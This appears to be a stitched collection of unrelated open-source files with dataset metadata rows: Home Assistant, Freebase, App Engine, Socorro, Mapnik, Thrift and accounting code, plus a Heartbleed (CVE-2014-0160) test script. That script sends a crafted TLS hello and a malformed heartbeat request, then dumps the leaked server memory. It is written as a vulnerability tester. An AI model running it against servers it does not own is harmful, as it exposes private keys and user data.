return self.wink.state()
@property
def state_attributes(self):
""" Returns optional state attributes. """
return {
ATTR_FRIENDLY_NAME: self.wink.name()
}
def turn_on(self, **kwargs):
""" Turns the switch on. """
self.wink.setState(True)
def turn_off(self):
""" Turns the switch off. """
self.wink.setState(False)
def update(self):
""" Update state of the light. """
self.wink.updateState()
|
mit
| -1,104,886,890,720,861,200
| 28.712871
| 76
| 0.629124
| false
| 3.737235
| true
| false
| false
|
lemoogle/iod-freebase-indexer
|
utils.py
|
1
|
8062
|
import json
import urllib
import requests
import itertools
import time
class FreebaseUtil(object):
freebase_topic_url="https://www.googleapis.com/freebase/v1/topic{}?filter=/common/topic/description&key={}"
service_url = 'https://www.googleapis.com/freebase/v1/mqlread'
aliases=[]
def __init__(self,freebase_key):
self.freebase_key=freebase_key
def runQuery(self,index,query,cursor="",category=False,description=False,):
count=100
if not cursor:
cursor = self.do_query(index,query,cursor=cursor,category=category,description=description)
while(cursor):
print cursor
count+=100
print count
open('cursor','wb').write(cursor)
cursor = self.do_query(index,query,cursor=cursor,category=category,description=description)
def do_query(self,index,query,cursor="",category=False,description=False):
params = {
'query': json.dumps(query),
'key': self.freebase_key
}
params['cursor']=cursor
url = self.service_url + '?' + urllib.urlencode(params)
response = requests.get(url).json()#json.loads(urllib2.urlopen(url).read())
for result in response['result']:
#print result['mid']
#print result
if description:
try:
freebase_url=self.freebase_topic_url.format(result["mid"],self.freebase_key)
content = requests.get(freebase_url).json()
content=content["property"]["/common/topic/description"]["values"][0]["value"]
result["content"]=content
except:
pass
#print result
#print content, freebase_topic_url.format(result["mid"],api_key)
else:
result["content"]=""
result["reference"] = result.pop("mid")
result["title"] = result.pop("name")
#characters= result["issues"];
#if characters:
# characters=map(lambda x: x.get('characters_on_cover',[]) ,characters )
# characters=reduce(lambda x, y: x+y, characters)
#result["featured_characters"]+=characters
#result.pop('issues')
result= self.flatten(result)
result= self.flattenlists(result)
if category:
result= self.standardize(result)
result=self.prepareCategory(result)
if result==0:
continue
#print result
if "authorname" in result:
result["category"]=result["authorname"]
index.pushDoc(result)
#print json.dumps(flatten(result),indent=4)
#print result["continues"]
try:
print "trying to index"
print index.commit(async=True).jobID
except:
print "indexing failed"
# try:
# print "trying to index"
# except:
# print "indexing failed"
return response.get("cursor")
def do_query_category(self,index,cursor=""):
self.params['cursor']=cursor
url = self.service_url + '?' + urllib.urlencode(self.params)
response = requests.get(url).json()#json.loads(urllib2.urlopen(url).read())
try:
a=response['result']
except:
print response
for result in response['result']:
#print result['mid']
#print result
if self.description:
try:
freebase_url=self.freebase_topic_url.format(result["mid"],self.params["key"])
content = requests.get(freebase_url).json()
content=content["property"]["/common/topic/description"]["values"][0]["value"]
result["content"]=content
except:
pass
#print result
#print content, freebase_topic_url.format(result["mid"],api_key)
else:
result["content"]=""
result["reference"] = result.pop("mid")
result["title"] = result.pop("name")
#characters= result["issues"];
#if characters:
# characters=map(lambda x: x.get('characters_on_cover',[]) ,characters )
# characters=reduce(lambda x, y: x+y, characters)
#result["featured_characters"]+=characters
#result.pop('issues')
result= self.flatten(result)
result= self.flattenlists(result)
result= self.standardize(result)
result=self.prepareCategory(result)
index.pushDoc(result)
#print json.dumps(flatten(result),indent=4)
#print result["continues"]
#print index.name
try:
print "trying to index"
print index.commit(async=True).jobID
except:
print "indexing failed"
return response.get("cursor")
def standardize(self,result):
#print result,"hello"
for k,v in result.iteritems():
splits = k.split("/")
#print len(splits)
if len(splits)>1:
result[splits[len(splits)-1]]=v
result.pop(k)
if 'key_namespace' in result:
result.pop('key_namespace')
result['wikipedia_url']="http://en.wikipedia.org/wiki/index.html?curid=%s" % result.pop("key_value")
return result
def prepareCategory(self,result):
phrase = result["title"]
if not phrase:
return 0
rest='("'+phrase+'") '
content=phrase+" "
#print result
for aliaskey in self.aliases:
for alias in result[aliaskey]:
content+=alias+" "
rest+=" OR (\"%s\") " % alias
if "," in phrase:
phrase =phrase.split(',')[0]
rest+="OR (\"%s\") " % phrase
if "Street" in phrase:
rest+=" OR (\"%s\") " % phrase.replace("Street","")
result['booleanrestriction']=rest
result['content']=content
return result
def flatten(self,obj, key=""):
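        # Flattens nested dicts/lists into underscore-joined keys, e.g.
        # (illustrative) {'a': {'b': 1}} -> {'a_b': 1}; lists of dicts are
        # gathered into lists keyed by the joined path.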
key=key.split(":")[0]
if type(obj) is dict:
orig=dict(obj)
for k,v in obj.iteritems():
#print k,v
#key=key.split(":")[0]
#splits = key.split("/")
#print len(splits)
#key=splits[len(splits)-1]
newkey=""
if key:
newkey=key+"_"
newkey+=k
if type(v) is dict:
orig.update(self.flatten(v,newkey))
orig.pop(k)
elif type(v) is list:
flatlist=self.flatten(v,newkey);
if flatlist:
orig.update(flatlist)
orig.pop(k)
#print flatten(val,newkey)
#orig.update(flatten(v,newkey))
else:
if key:
orig[newkey]=v
orig.pop(k)
return orig
if type(obj) is list:
new={}
for a in obj:
if type(a) is dict:
#key=key.split(":")[0]
for k,v in self.flatten(a,key).iteritems():
#print new.get(k,[]).append(v)
#print k,v
if type(v) is list:
k=key+"_"+k
new[k]=new.get(k,[])
new[k].append(v)
if not new:
return False
return new
return obj
def flattenlists(self,obj):
for k,v in obj.iteritems():
if type(v) is list and len(v)>0 and not isinstance(v[0], basestring):
obj[k]=list(itertools.chain(*v))
return obj
|
mit
| 4,380,003,460,438,810,000
| 31.508065
| 111
| 0.499504
| false
| 4.357838
| false
| false
| false
|
johnmarkschofield/heartbleed-weaponized
|
takeshixx.py
|
1
|
4770
|
#!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
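# The 8 bytes above encode a malformed heartbeat request: record type 0x18
# (heartbeat), protocol version 03 02 (TLS 1.1), record length 0x0003, then
# message type 01 (heartbeat_request) and a claimed payload length of 0x4000
# (16384) bytes with no payload actually sent -- the mismatch that triggers
# the over-read on vulnerable servers.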
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
if opts.starttls:
re = s.recv(4096)
if opts.debug: print re
s.send('ehlo starttlstest\n')
re = s.recv(1024)
if opts.debug: print re
if not 'STARTTLS' in re:
if opts.debug: print re
print 'STARTTLS not supported...'
sys.exit(0)
s.send('starttls\n')
re = s.recv(1024)
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
|
mit
| -2,765,998,675,257,244,700
| 30.176471
| 122
| 0.57652
| false
| 3.356791
| false
| false
| false
|
nakayamaqs/PythonModule
|
Learning/func_return.py
|
1
|
1354
|
# from :http://docs.python.org/3.3/faq/programming.html#what-is-the-difference-between-arguments-and-parameters
# By returning a tuple of the results:
def func2(a, b):
a = 'new-value' # a and b are local names
b = b + 1 # assigned to new objects
return a, b # return new values
x, y = 'old-value', 99
x, y = func2(x, y)
print(x, y) # output: new-value 100
# By passing a mutable (changeable in-place) object:
def func1(a):
a[0] = 'new-value' # 'a' references a mutable list
a[1] = a[1] + 1 # changes a shared object
args = ['old-value', 99]
func1(args)
print(args[0], args[1]) # output: new-value 100
# By passing in a dictionary that gets mutated:
def func3(args):
args['a'] = 'new-value' # args is a mutable dictionary
args['b'] = args['b'] + 1 # change it in-place
args = {'a': 'old-value', 'b': 99}
func3(args)
print(args['a'], args['b'])
# Or bundle up values in a class instance:
class callByRef:
def __init__(self, **args):
for (key, value) in args.items():
setattr(self, key, value)
def func4(args):
args.a = 'new-value by func4.' # args is a mutable callByRef
args.b = args.b + 100 # change object in-place
args = callByRef(a='old-value', b=99,c=23)
func4(args)
print(args.a, args.b, args.c)
|
mit
| 7,679,583,819,250,892,000
| 28.434783
| 111
| 0.595273
| false
| 2.930736
| false
| false
| false
|
nardorb/OneStop
|
models/taxi_driver.py
|
1
|
1177
|
from google.appengine.ext import db
class TaxiDriver(db.Model):
EXCEPTION_NO_PARENT = "`parent` property must be an `Account` object."
name = db.StringProperty(default=None)
email = db.EmailProperty(default=None)
sex = db.StringProperty(default=None)
address = db.StringProperty(default=None)
parish = db.StringProperty(default=None)
tel_number = db.StringProperty(default=None)
# years_with_license = db.StringProperty(default=None)
# road_accidents = db.IntegerProperty(default=None)
driver_id = db.StringProperty(default=None)
is_on_duty = db.BooleanProperty(default=False)
location = db.StringProperty(default=None)
dob = db.StringProperty(default=None)
@classmethod
def get_by_driver_id(cls, driver_id):
return cls.all().filter('driver_id =', driver_id).get()
def get_by_location(self, location):
return None
def put(self, *args, **kwargs):
# This is not at the top to prevent circular imports.
from models.account import Account
parent = self.parent()
if not parent or not isinstance(parent, Account):
raise ValueError(self.EXCEPTION_NO_PARENT)
return super(TaxiDriver, self).put(*args, **kwargs)
|
gpl-2.0
| 1,523,704,451,616,366,000
| 33.647059
| 72
| 0.724724
| false
| 3.566667
| false
| false
| false
|
mattbrowley/PSim
|
Covariances.py
|
1
|
7985
|
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import PSim
import pickle
import csv
import simplex
fit_type = 'global'
scale = 0.003
with open("pickled_data.p", "r") as file:
pickled_data = pickle.load(file)
powers = pickled_data['powers']
xdata = pickled_data['allxdata']
ydata = pickled_data['allydata']
xarray = pickled_data['xarray']
yarrays = pickled_data['yarrays']
averages = pickled_data['averages']
period = 50 # ns
with open("pickled_data_250.p", "r") as file:
pickled_data_250 = pickle.load(file)
powers_250 = pickled_data_250['powers']
xdata_250 = pickled_data_250['allxdata']
ydata_250 = pickled_data_250['allydata']
xarray_250 = pickled_data_250['xarray']
yarrays_250 = pickled_data_250['yarrays']
averages_250 = pickled_data_250['averages']
period_250 = 1.0 / 250000.0 / 1e-9 # ns
def scalar_min(p, data):
xdata, ydata, ysim = data[0]
xdata_250, ydata_250, ysim_250 = data[1]
scaled_ysim = ysim * p[0]
scaled_ysim_250 = ysim_250 * p[0]
err_20 = 0
err_250 = 0
num_points = 0
for dat, sim in zip(ydata, scaled_ysim):
for x, d, s in zip(xdata, dat, sim):
try:
if s > 0:
log_s = np.log(s)
else:
log_s = 0
log_d = np.log(d)
error = (log_s - log_d)
# error = np.log(error)
err_20 += error*error
num_points = num_points + 1
except:
err_20 += 8e20
err_20 = err_20 / num_points
num_points = 0
for dat, sim in zip(ydata_250[:-1], scaled_ysim_250[:-1]):
for x, d, s in zip(xdata_250, dat, sim):
try:
if s > 0:
log_s = np.log(s)
else:
log_s = 0
log_d = np.log(d)
error = (log_s - log_d)
# error = np.log(error)
if x >= -0.25 and x <= 120:
err_250 += error*error
num_points = num_points + 1
except:
err_250 += 8e20
err_250 = err_250 / num_points
err = np.sqrt(err_250*err_20)
if np.isnan(err):
err = 7e20
fitness = err * 100
return fitness
def evaluate(p):
dummy_x = np.zeros(10)
dummy_y = np.zeros([10, 10])
data = [[dummy_x, dummy_y, dummy_y], [dummy_x, dummy_y, dummy_y]]
    if fit_type == 'global' or fit_type == 20:  # 20 MHz data
sim = PSim.DecaySim(reprate=20000000, tolerance=0.005, step=5e-12)
sim.trap = p[0]
sim.EHdecay = p[1] * sim.step
sim.Etrap = p[2] * sim.step
sim.FHloss = p[3] * sim.step
sim.Gdecay = p[4] * sim.step
sim.G2decay = p[5] * sim.step
sim.G3decay = p[6] * sim.step
sim.GHdecay = p[7] * sim.step
sim.Gescape = p[8] * sim.step
sim.Gform = p[9] * sim.step * 0
sim.G3loss = p[9] * sim.step
sim.scalar = 1
for power in powers:
sim.addPower(power)
sim.runSim()
interp_signals = []
for this_run in sim.signal:
interp_this = np.interp(xarray, sim.xdata, this_run)
interp_signals.append(interp_this)
interp_signals = np.array(interp_signals)
data[0] = [xarray, yarrays, interp_signals]
    if fit_type == 'global' or fit_type == 250:  # 250 kHz data
sim_250 = PSim.DecaySim(reprate=250000, tolerance=0.005, step=5e-12)
sim_250.trap = p[0]
sim_250.EHdecay = p[1] * sim_250.step
sim_250.Etrap = p[2] * sim_250.step
sim_250.FHloss = p[3] * sim_250.step
sim_250.Gdecay = p[4] * sim_250.step
sim_250.G2decay = p[5] * sim_250.step
sim_250.G3decay = p[6] * sim_250.step
sim_250.GHdecay = p[7] * sim_250.step
sim_250.Gescape = p[8] * sim_250.step
sim_250.Gform = p[9] * sim_250.step * 0
sim_250.G3loss = p[9] * sim_250.step
sim_250.scalar = 1
for power in powers_250:
sim_250.addPower(power)
sim_250.runSim()
interp_signals_250 = []
for this_run in sim_250.signal:
interp_this = np.interp(xarray_250, sim_250.xdata, this_run)
interp_signals_250.append(interp_this)
interp_signals_250 = np.array(interp_signals_250)
data[1] = [xarray_250, yarrays_250, interp_signals_250]
# Use a simplex minimization to find the best scalar
scalar0 = np.array([3e-26])
ranges = scalar0*0.1
s = simplex.Simplex(scalar_min, scalar0, ranges)
values, fitness, iter = s.minimize(epsilon=0.00001, maxiters=500,
monitor=0, data=data)
scalar = values[0]
#p[-1] = scalar
if scalar < 0:
fitness = 1e30
return fitness
def main():
logname = 'best_{}.log'.format(fit_type)
with open(logname, 'rb') as best_file:
reader = csv.reader(best_file, dialect='excel-tab')
p0 = []
for val in reader.next():
p0.append(np.float(val))
dim = 11
pi = np.ones(dim)
for i, n in enumerate([0,1,2,3,4,5,6,7,8,9,10]):
pi[i] = p0[n]
ps1 = np.ndarray([dim, dim, dim])
ps2 = np.ndarray([dim, dim, dim])
fitness1 = np.ndarray([dim, dim])
fitness2 = np.ndarray([dim, dim])
differences = scale*pi
for i in range(dim):
for j in range(dim):
for k in range(dim):
val1 = pi[k]
val2 = pi[k]
if i == k or j == k:
val1 = val1 + differences[k]
val2 = val2 - differences[k]
ps1[i][j][k] = val1
ps2[i][j][k] = val2
for i in range(dim):
for j in range(i, dim):
fitness1[i][j] = evaluate(ps1[i][j])
fitness1[j][i] = fitness1[i][j]
fitness2[i][j] = evaluate(ps2[i][j])
fitness2[j][i] = fitness2[i][j]
error0 = evaluate(pi)
data = {'fitness1': fitness1,
'fitness2': fitness2,
'differences': differences,
'error0': error0}
with open("covariance_data_{}.p".format(scale), "wb") as file:
pickle.dump(data, file)
hessian = np.ndarray([dim, dim])
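    # The Hessian below is approximated with central differences of the
    # fitness evaluations computed above: diagonal entries combine f(p+d),
    # f(p) and f(p-d); off-diagonal entries difference the mixed evaluations
    # from both directions and are averaged to keep the matrix symmetric.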
for i in range(dim):
for j in range(dim):
if i == j:
d2i = differences[i]
df1 = (fitness1[i][j] - error0) / d2i
df2 = (error0 - fitness2[i][j]) / d2i
hessian[i][j] = (df1 - df2) / (d2i)
else:
df1di1 = (fitness1[i][i] - error0) / differences[i]
df1di2 = (fitness1[i][j] - fitness1[j][j]) / differences[i]
dff1didj = (df1di2 - df1di1) / differences[j]
df2di1 = (error0 - fitness2[i][i]) / differences[i]
df2di2 = (fitness2[j][j] - fitness2[i][j]) / differences[i]
dff2didj = (df2di2 - df2di1) / differences[j]
hessian[i][j] = (dff1didj + dff2didj) / 2
hessian[j][i] = hessian[i][j]
with open("hessian_{}.p".format(scale), "wb") as file:
pickle.dump(hessian, file)
m_hessian = np.matrix(hessian)
covariance = np.linalg.inv(m_hessian)
cv_array = np.array(covariance)
paramaters=['Traps', 'EH_Decay', 'E_Trap', 'TH_loss', 'G_Decay', 'G2_Decay', 'G3_Decay', 'GH_Decay', 'G_Escape', 'G3_Loss']
    for i in range(len(paramaters)):
        print('{}{}: {} +- {}'.format(' ' * (8 - len(paramaters[i])), paramaters[i], p0[i], np.sqrt(cv_array[i][i])))
with open('Parameters_{}.txt'.format(scale), 'w') as f:
writer = csv.writer(f, dialect="excel-tab")
for i in range(10):
error = np.sqrt(cv_array[i][i])
relerror = error / pi[i] * 100
words = '{}{}: {} +- {} ({}%)'.format(' ' * (8-len(paramaters[i])), paramaters[i], pi[i], error, relerror)
print(words)
writer.writerow([words])
if __name__ == '__main__':
main()
|
mit
| 8,866,360,628,721,313,000
| 35.295455
| 127
| 0.520726
| false
| 2.985047
| false
| false
| false
|
mozilla/socorro
|
webapp-django/crashstats/exploitability/tests/test_views.py
|
1
|
5320
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import pyquery
from django.conf import settings
from django.urls import reverse
from crashstats.crashstats import models
from crashstats.crashstats.tests.test_views import BaseTestViews
from crashstats.supersearch.models import SuperSearchUnredacted
class TestViews(BaseTestViews):
def test_exploitability_report(self):
models.BugAssociation.objects.create(
bug_id=111111111, signature="FakeSignature 1"
)
models.BugAssociation.objects.create(
bug_id=222222222, signature="FakeSignature 3"
)
models.BugAssociation.objects.create(
bug_id=101010101, signature="FakeSignature"
)
url = reverse("exploitability:report")
queried_versions = []
def mocked_supersearch_get(**params):
assert params["product"] == ["WaterWolf"]
queried_versions.append(params.get("version"))
assert params["_aggs.signature"] == ["exploitability"]
assert params["_facets_size"] == settings.EXPLOITABILITY_BATCH_SIZE
assert params["exploitability"]
assert params["_fields"]
facets = [
{
"count": 229,
"facets": {
"exploitability": [
{"count": 210, "term": "none"},
{"count": 19, "term": "low"},
]
},
"term": "FakeSignature 1",
},
{
"count": 124,
"facets": {
"exploitability": [
{"count": 120, "term": "none"},
{"count": 1, "term": "high"},
{"count": 4, "term": "interesting"},
]
},
"term": "FakeSignature 3",
},
{
"count": 104,
"facets": {
"exploitability": [
{"count": 93, "term": "low"},
{"count": 11, "term": "medium"},
]
},
"term": "Other Signature",
},
{
"count": 222,
"facets": {
"exploitability": [
# one that doesn't add up to 4
{"count": 10, "term": "null"},
{"count": 20, "term": "none"},
]
},
"term": "FakeSignature",
},
]
return {"facets": {"signature": facets}, "hits": [], "total": 1234}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 302
user = self._login()
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 302
group = self._create_group_with_permission("view_exploitability")
user.groups.add(group)
assert user.has_perm("crashstats.view_exploitability")
# unrecognized product
response = self.client.get(url, {"product": "XXXX"})
assert response.status_code == 404
# unrecognized version
response = self.client.get(url, {"product": "WaterWolf", "version": "0000"})
assert response.status_code == 400
# valid version but not for WaterWolf
response = self.client.get(url, {"product": "WaterWolf", "version": "1.5"})
assert response.status_code == 400
# if you omit the product, it'll redirect and set the default product
response = self.client.get(url)
assert response.status_code == 302
assert response["Location"].endswith(
url + "?product=%s" % settings.DEFAULT_PRODUCT
)
response = self.client.get(url, {"product": "WaterWolf", "version": "19.0"})
assert response.status_code == 200
doc = pyquery.PyQuery(response.content)
# We expect a table with 3 different signatures
# The signature with the highest high+medium count is
# 'Other Signature' etc.
tds = doc("table.data-table tbody td:first-child a")
texts = [x.text for x in tds]
assert texts == ["Other Signature", "FakeSignature 3", "FakeSignature 1"]
# The first signature doesn't have any bug associations,
# but the second and the third does.
rows = doc("table.data-table tbody tr")
texts = [[x.text for x in doc("td.bug_ids_more a", row)] for row in rows]
expected = [[], ["222222222"], ["111111111"]]
assert texts == expected
assert queried_versions == [["19.0"]]
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 200
assert queried_versions == [["19.0"], None]
|
mpl-2.0
| -6,342,788,906,215,783,000
| 37.550725
| 87
| 0.509023
| false
| 4.493243
| true
| false
| false
|
mapycz/mapnik
|
utils/mapnik-index/build.py
|
1
|
2028
|
#
# This file is part of Mapnik (c++ mapping toolkit)
#
# Copyright (C) 2015 Artem Pavlenko
#
# Mapnik is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
#
import os
import glob
from copy import copy
Import ('env')
Import ('plugin_base')
program_env = plugin_base.Clone()
source = Split(
"""
mapnik-index.cpp
process_csv_file.cpp
process_geojson_file.cpp
../../plugins/input/csv/csv_utils.cpp
"""
)
headers = env['CPPPATH']
libraries = [env['MAPNIK_NAME']]
# need on linux: https://github.com/mapnik/mapnik/issues/3145
libraries.append('mapnik-json')
libraries.append('mapnik-wkt')
libraries.append(env['ICU_LIB_NAME'])
libraries.append(env['BOOST_LIB_PATHS']['system'])
libraries.append(env['BOOST_LIB_PATHS']['program_options'])
if env['RUNTIME_LINK'] == 'static':
libraries.extend(copy(env['LIBMAPNIK_LIBS']))
if env['PLATFORM'] == 'Linux':
libraries.append('dl')
mapnik_index = program_env.Program('mapnik-index', source, CPPPATH=headers, LIBS=libraries)
Depends(mapnik_index, env.subst('../../src/%s' % env['MAPNIK_LIB_NAME']))
if 'uninstall' not in COMMAND_LINE_TARGETS:
env.Install(os.path.join(env['INSTALL_PREFIX'],'bin'), mapnik_index)
env.Alias('install', os.path.join(env['INSTALL_PREFIX'],'bin'))
env['create_uninstall_target'](env, os.path.join(env['INSTALL_PREFIX'],'bin','mapnik-index'))
|
lgpl-2.1
| 6,641,049,399,856,726,000
| 31.190476
| 93
| 0.711045
| false
| 3.335526
| false
| false
| false
|
ashishb/benchmarking
|
serialization/exec_thrift.py
|
1
|
1364
|
import os
import random
import sys
sys.path.append(os.path.join(os.getcwd(), 'gen-py'))
from thrift.protocol import TBinaryProtocol
from thrift.transport import TTransport
# Generated using
# thrift -o . --gen py:new_style student.thrift
from student.ttypes import Course
from student.ttypes import Student
# Based on http://wiki.apache.org/thrift/ThriftUsagePython
def getNewStudent(i, num_courses):
new_student = Student()
new_student.id = random.randint(0, i)
new_student.first_name = str(random.randint(0, i))
new_student.last_name = str(random.randint(0, i))
new_student.comments = str(random.randint(0, i))
new_student.courses = list()
for j in xrange(0, num_courses):
new_course = Course()
new_course.name = str(random.randint(0, i)) + str(random.randint(0, j))
new_course.marks = 100 * random.randint(0, j) / num_courses
new_student.courses.append(new_course)
return new_student
def serialize(student):
student.validate()
transport_out = TTransport.TMemoryBuffer()
protocol_out = TBinaryProtocol.TBinaryProtocol(transport_out)
student.write(protocol_out)
bytes = transport_out.getvalue()
return bytes
def deserialize(serialized_student):
transport_in = TTransport.TMemoryBuffer(serialized_student)
protocol_in = TBinaryProtocol.TBinaryProtocol(transport_in)
student = Student()
student.read(protocol_in)
return student
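# Hypothetical round-trip check (not part of the original script): serialize a
# random Student and confirm the deserialized copy carries the same fields.
if __name__ == '__main__':
    original = getNewStudent(100, 5)
    copy = deserialize(serialize(original))
    assert copy.id == original.id
    assert copy.first_name == original.first_name
    assert len(copy.courses) == len(original.courses)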
|
apache-2.0
| -2,492,919,796,256,315,400
| 29.311111
| 73
| 0.756598
| false
| 3.239905
| false
| false
| false
|
tedlaz/pyted
|
pylogistiki/book.py
|
1
|
17624
|
'''Basic module for accounting'''
import utils as ul
import parse_singularo_afm as pafm
FORMAT_LINE = '%-15s %12s %12s'
SPLIT_CHAR = '.'
LM1 = ul.read_txt_to_dict('log_sxedio.txt')
def parse_afm_5398(file='afm-5398.txt'):
afmdic = {}
pfpadic = {}
with open(file) as fle:
for line in fle:
lmos, afm, pfpa, _ = line.split('|')
afmdic[lmos] = afm
pfpadic[lmos] = ul.dec(ul.dec(pfpa) / ul.dec(100))
return afmdic, pfpadic
def date2period(isodate):
year, month, _ = isodate.split('-')
imonth = int(month)
if imonth <= 3:
return '%s-%s-%s' % (year, '03', '31')
elif imonth <= 6:
return '%s-%s-%s' % (year, '06', '30')
elif imonth <= 9:
return '%s-%s-%s' % (year, '09', '30')
elif imonth <= 12:
return '%s-%s-%s' % (year, '12', '31')
else:
return '%s-%s-%s' % (year, '12', '31')
class Line():
def __init__(self, lmo, xre, pis):
assert xre + pis != 0
self.lmo = lmo
self.xre = ul.dec(xre)
self.pis = ul.dec(pis)
def lmop(self, lmodic):
return lmodic.get(self.lmo, self.lmo)
@property
def typos(self):
typ = set()
if self.lmo.startswith('1'):
typ.add('ΠΑΓΙΑ')
typ.add('ΕΕ')
typ.add('1')
if self.lmo.startswith('2'):
typ.add('ΑΠΟΘΕΜΑΤΑ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΞΟΔΑ')
typ.add('2')
if self.lmo.startswith('20'):
typ.add('ΕΜΠΟΡΕΥΜΑΤΑ')
if self.lmo.startswith('20.00'):
typ.add('ΑΠΟΓΡΑΦΗ ΕΜΠΟΡΕΥΜΑΤΩΝ')
if self.lmo.startswith('20.01'):
typ.add('ΑΓΟΡΕΣ ΕΜΠΟΡΕΥΜΑΤΩΝ')
typ.add('ΑΓΟΡΕΣ')
if self.lmo.startswith('24.01'):
typ.add("ΑΓΟΡΕΣ Α' ΚΑΙ Β' ΥΛΩΝ")
typ.add('ΑΓΟΡΕΣ')
if self.lmo.startswith('3'):
typ.add('ΑΠΑΙΤΗΣΕΙΣ')
typ.add('3-5')
if self.lmo.startswith('38'):
typ.add('ΜΕΤΡΗΤΑ')
if self.lmo.startswith('4'):
typ.add('ΚΕΦΑΛΑΙΟ')
if self.lmo.startswith('5'):
typ.add('ΥΠΟΧΡΕΩΣΕΙΣ')
typ.add('3-5')
if self.lmo.startswith('50'):
typ.add('ΠΡΟΜΗΘΕΥΤΕΣ')
if self.lmo.startswith('54.00'):
typ.add('ΦΠΑ')
typ.add('54.00')
if self.lmo.startswith('6'):
typ.add('ΕΞΟΔΑ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΞΟΔΑ')
typ.add('6')
if self.lmo.startswith('7'):
typ.add('ΕΣΟΔΑ')
typ.add('ΠΩΛΗΣΕΙΣ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΣΟΔΑ')
typ.add('7')
if self.lmo.startswith('70'):
typ.add('ΠΩΛΗΣΕΙΣ ΕΜΠΟΡΕΥΜΑΤΩΝ')
if self.lmo.startswith('71'):
typ.add('ΠΩΛΗΣΕΙΣ ΠΡΟΪΟΝΤΩΝ')
if self.lmo.startswith('8'):
typ.add('ΑΝΟΡΓΑΝΑ')
return typ
def is_typos(self, typos):
return typos in self.typos
def has_tag(self, tag):
return tag in self.typos
@property
def is_xreostiko(self):
return self.y > 0
@property
def y(self):
return self.xre - self.pis
@property
def gy(self):
return ul.dec2gr(self.y)
@property
def gxre(self):
return ul.dec2gr(self.xre)
@property
def gpis(self):
